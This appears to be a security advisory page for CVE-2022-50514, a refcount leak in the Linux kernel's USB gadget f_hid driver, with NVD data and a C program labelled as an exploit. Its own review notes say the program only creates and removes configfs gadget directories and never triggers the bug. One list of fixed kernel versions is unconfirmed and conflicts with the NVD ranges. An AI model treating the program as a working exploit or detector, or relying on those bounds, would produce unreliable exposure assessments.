Security Vulnerability Report
CVE-2022-50514 CVSS 5.5 MEDIUM

CVE-2022-50514

Published: 2025-10-07 16:15:35
Last Modified: 2026-03-17 14:11:50
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

usb: gadget: f_hid: fix refcount leak on error path

When failing to allocate report_desc, opts->refcnt has already been incremented, so it needs to be decremented to avoid leaving the options structure permanently locked.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
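Linux Kernel < 5.10.150 (exact fixed version to be confirmed)
Linux Kernel < 5.15.75 (exact fixed version to be confirmed)
Linux Kernel < 6.0 (exact fixed version to be confirmed)
Note: these three bounds are unconfirmed and differ from the NVD configuration data in the Raw JSON section below, which gives the fixed releases as 4.19.270, 5.4.229, 5.10.163, 5.15.86, 6.0.16 and 6.1.2. Use the NVD ranges when checking a kernel.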
All versions without patch 216437dd64fce36791a3b6cc8f8013df36856958 applied
All versions without patch 70a3288a7586526315105c699b687d78cd32559a applied
All versions without patch 80dc47e751a837106c09bec73964ff8f7ea280b4 applied
All versions without patch 95412c932b3c9e8cc4431dac4fac8fcd80d54982 applied
All versions without patch 9d4a0aca8a75550d3456c8de339a341dc4536ec5 applied

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
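/*
 * CVE-2022-50514 - configfs exercise of the USB gadget f_hid function.
 *
 * The advisory describes a leak of opts->refcnt on the error path taken when
 * the kernel fails to allocate report_desc.
 *
 * NOTE(review): nothing in this listing makes a kernel allocation fail. It
 * only creates configfs directories, writes a report descriptor and removes
 * the directories again, so as written it does not demonstrate the leak and
 * must not be used as a "vulnerable vs. patched" check. To decide whether a
 * host is affected, compare the running kernel with the fixed releases
 * listed in the advisory.
 *
 * Requires root privileges and a kernel with USB gadget configfs support.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <errno.h>
#include <limits.h>

/*
 * NOTE(review): every path below is built as GADGET_PATH/<gadget_name>/...,
 * and nothing in this file creates the "test_gadget" directory itself, so the
 * directory creation in create_gadget_hid() is expected to fail unless it
 * already exists - confirm the intended layout.
 */
#define GADGET_PATH "/sys/kernel/config/usb_gadget/test_gadget"

/*
 * NOTE(review): unused, and it does not match the descriptor below, which is
 * 21 bytes long; callers pass sizeof(hid_report_desc) instead.
 */
#define HID_DESC_LEN 18

/* Minimal HID report descriptor */
static unsigned char hid_report_desc[] = {
    0x06, 0x00, 0xFF, /* Usage Page (Vendor Defined) */
    0x09, 0x01,       /* Usage (Vendor Usage 1) */
    0xA1, 0x01,       /* Collection (Application) */
    0x09, 0x02,       /* Usage (Vendor Usage 2) */
    0x15, 0x00,       /* Logical Minimum (0) */
    0x26, 0xFF, 0x00, /* Logical Maximum (255) */
    0x75, 0x08,       /* Report Size (8) */
    0x95, 0x40,       /* Report Count (64) */
    0x81, 0x02,       /* Input (Data,Var,Abs) */
    0xC0              /* End Collection */
};

/* Build GADGET_PATH/<gadget_name><suffix>; fails with ENAMETOOLONG on truncation. */
static int gadget_path(char *dst, size_t cap, const char *gadget_name,
                       const char *suffix)
{
    int n = snprintf(dst, cap, "%s/%s%s", GADGET_PATH, gadget_name, suffix);

    if (n < 0 || (size_t)n >= cap) {
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

/* Create one directory, treating an already existing one as success. */
static int ensure_dir(const char *path)
{
    if (mkdir(path, 0755) != 0 && errno != EEXIST) {
        return -1;
    }
    return 0;
}

/**
 * Create the configfs directories for one gadget with a single hid.usb0
 * function and write @report_desc into the function's report_desc attribute.
 *
 * @param gadget_name  directory name created under GADGET_PATH
 * @param report_desc  descriptor bytes to write
 * @param desc_len     number of bytes in @report_desc
 * @return 0 on success, -1 on any failure (a diagnostic is printed to stderr)
 */
int create_gadget_hid(const char *gadget_name, unsigned char *report_desc, int desc_len)
{
    /* Directories in creation order; parents come before children. */
    static const char *const dirs[] = {
        "",
        "/strings/0x409",
        "/configs/c.1",
        "/configs/c.1/strings/0x409",
        "/functions/hid.usb0",
    };
    char path[PATH_MAX];
    ssize_t written;
    int fd;

    if (gadget_name == NULL || report_desc == NULL || desc_len < 0) {
        errno = EINVAL;
        perror("create_gadget_hid");
        return -1;
    }

    /*
     * The original ignored every mkdir() result and only noticed a problem
     * when open() failed; report the first directory that cannot be created.
     */
    for (size_t i = 0; i < sizeof dirs / sizeof dirs[0]; i++) {
        if (gadget_path(path, sizeof path, gadget_name, dirs[i]) != 0 ||
            ensure_dir(path) != 0) {
            perror("mkdir gadget directory");
            return -1;
        }
    }

    if (gadget_path(path, sizeof path, gadget_name,
                    "/functions/hid.usb0/report_desc") != 0) {
        perror("report_desc path");
        return -1;
    }

    fd = open(path, O_WRONLY);
    if (fd < 0) {
        perror("open report_desc");
        return -1;
    }

    /*
     * A successful write stores the descriptor; it is the normal path, not
     * the allocation-failure path named in the advisory.
     */
    written = write(fd, report_desc, (size_t)desc_len);
    if (written < 0) {
        perror("write report_desc");
        close(fd);
        return -1;
    }
    if (written != (ssize_t)desc_len) {
        /* errno is not meaningful for a short write, so do not use perror(). */
        fprintf(stderr, "write report_desc: short write\n");
        close(fd);
        return -1;
    }

    if (close(fd) != 0) {
        perror("close report_desc");
        return -1;
    }
    return 0;
}

/**
 * Best-effort removal of everything create_gadget_hid() created for
 * @gadget_name. Errors are ignored, as in the original.
 *
 * The original ran "rm -rf" through system(); that builds a shell command
 * from a string, and a recursive delete does not suit configfs, where
 * attribute files cannot be unlinked and directories are removed with
 * rmdir(). The directories are therefore removed individually, children
 * before parents.
 */
void cleanup_gadget(const char *gadget_name)
{
    static const char *const dirs[] = {
        "/configs/c.1/strings/0x409",
        "/configs/c.1",
        "/functions/hid.usb0",
        "/strings/0x409",
        "",
    };
    char path[PATH_MAX];

    if (gadget_name == NULL) {
        return;
    }

    /* Unlink function from config (a no-op when no link was ever made). */
    if (gadget_path(path, sizeof path, gadget_name,
                    "/configs/c.1/hid.usb0") == 0) {
        unlink(path);
    }

    for (size_t i = 0; i < sizeof dirs / sizeof dirs[0]; i++) {
        if (gadget_path(path, sizeof path, gadget_name, dirs[i]) == 0) {
            rmdir(path);
        }
    }
}

int main(int argc, char *argv[])
{
    int iterations = 100;

    (void)argc;
    (void)argv;

    if (getuid() != 0) {
        fprintf(stderr, "This PoC requires root privileges\n");
        return 1;
    }

    /* Mount configfs if not already mounted */
    if (mount("configfs", "/sys/kernel/config", "configfs", 0, NULL) != 0 &&
        errno != EBUSY) {
        perror("mount configfs");
        /* Continue anyway, configfs might already be mounted */
    }

    printf("CVE-2022-50514: exercising f_hid configfs setup and teardown\n");
    printf("Iterations: %d\n", iterations);

    /*
     * Repeatedly create and remove an HID gadget function.
     *
     * NOTE(review): the original comment claimed each iteration leaks a
     * reference and ends in resource exhaustion. Per the advisory, the leak
     * happens only when the report_desc allocation fails, and its stated
     * effect is an options structure left permanently locked. This loop does
     * not induce that failure.
     */
    for (int i = 0; i < iterations; i++) {
        char gadget_name[64];

        snprintf(gadget_name, sizeof(gadget_name), "gadget_%d", i);
        printf("[%d/%d] Creating gadget: %s\n", i + 1, iterations, gadget_name);

        if (create_gadget_hid(gadget_name, hid_report_desc,
                              sizeof(hid_report_desc)) < 0) {
            fprintf(stderr, "Failed to create gadget %s\n", gadget_name);
        }

        cleanup_gadget(gadget_name);
    }

    /*
     * The original told the reader to check a debugfs file named
     * "refcount-statistics"; the review could not confirm that such a file
     * exists, so the message now points at the reliable check instead.
     */
    printf("Run completed. This run does not force the allocation failure "
           "described in the advisory.\n");
    printf("To assess exposure, compare the running kernel version with the "
           "fixed releases listed for CVE-2022-50514.\n");
    return 0;
}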

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50514", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:34.983", "lastModified": "2026-03-17T14:11:49.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_hid: fix refcount leak on error path\n\nWhen failing to allocate report_desc, opts->refcnt has already been\nincremented so it needs to be decremented to avoid leaving the options\nstructure permanently locked."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.19", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AC36D7FF-60C4-4F9B-8BFB-5C7A377A0ABD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", 
"versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/216437dd64fce36791a3b6cc8f8013df36856958", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/70a3288a7586526315105c699b687d78cd32559a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/80dc47e751a837106c09bec73964ff8f7ea280b4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/95412c932b3c9e8cc4431dac4fac8fcd80d54982", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9d4a0aca8a75550d3456c8de339a341dc4536ec5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ba78f7c10606719f702c04a15fb0471507b32d7b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e88b89a096af0001bcff6bf7ad2feb1486487173", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}